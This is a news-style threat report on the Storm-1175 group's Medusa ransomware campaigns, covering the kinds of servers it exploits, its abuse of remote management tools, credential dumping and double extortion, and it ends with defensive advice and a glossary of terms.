Zero-Day Blitz: How Storm-1175’s Medusa Ransomware Raids Are Outpacing Defenders

In the high-stakes world of cybercrime, a shadowy group known as Storm-1175 has emerged as one of the fastest, most ruthless ransomware gangs on the planet. With a toolkit packed with zero-day exploits and a relentless pace, they are holding entire industries hostage - often before anyone even knows a patch exists.

Storm-1175’s modus operandi is as ruthless as it is efficient. The group scours the internet for vulnerable, web-facing servers - think email gateways, file transfer platforms, or remote management tools - and strikes in the critical window after a vulnerability’s public disclosure but before most organizations have patched. Sometimes, they’re even faster, exploiting zero-days before anyone else knows they exist.

Once inside, the attackers don’t waste a second. They immediately plant remote access tools or web shells, granting themselves a secret backdoor. New administrator accounts are created on the fly, and with a few commands via trusted system utilities like PowerShell or PsExec, Storm-1175 quietly maps the network, searching for valuable data and more systems to compromise - a technique known as “living off the land.”

But what makes Storm-1175 especially dangerous is their subversive use of legitimate remote monitoring and management (RMM) software. Tools such as AnyDesk, SimpleHelp, and ConnectWise ScreenConnect - meant for IT support - are hijacked for criminal control. By blending their malicious activity with everyday encrypted traffic, the hackers slip under the radar of conventional security tools.

Before unleashing the Medusa ransomware, Storm-1175 disables security defenses, tweaks antivirus exclusions, and dumps credentials using tools like Impacket and Mimikatz. Sensitive data is siphoned off using programs like Rclone, setting the stage for the group’s double-extortion strategy: pay up, or your data is leaked to the world.

Microsoft has tracked Storm-1175 exploiting over 16 major vulnerabilities since 2023, including several zero-days such as CVE-2025-10035 and CVE-2026-23760. Recently, the group has also targeted Linux systems, particularly Oracle WebLogic servers, widening their reach and impact.

The group’s “high operational tempo” has left a trail of disruption across continents. For defenders, the lesson is clear: the time between vulnerability disclosure and exploitation is shrinking fast. Isolating critical systems, enforcing strict credentials, and enabling tamper-proof security features are no longer optional - they’re a race against time.

As Storm-1175 continues to innovate and automate its attacks, organizations worldwide are left with a sobering reality: patching late is now as risky as not patching at all. In a world where cybercriminals weaponize vulnerabilities within hours, vigilance and speed have never been more critical.

WIKICROOK

• Zero: A zero-day vulnerability is a hidden security flaw unknown to the software maker, with no fix available, making it highly valuable and dangerous to attackers.
• Double: Double extortion is a cyberattack where criminals both encrypt and steal data, threatening to leak it unless the victim pays a ransom.
• Living Off the Land: Living Off the Land means attackers use trusted, built-in system tools for malicious purposes, making their activities harder to detect.
• Remote Monitoring and Management (RMM): Remote Monitoring and Management (RMM) are IT tools that let professionals remotely control, monitor, and maintain computers - helpful for support, but risky if misused.
• Credential Dumping: Credential dumping is when attackers steal usernames and passwords from a system’s memory to gain unauthorized access to accounts or networks.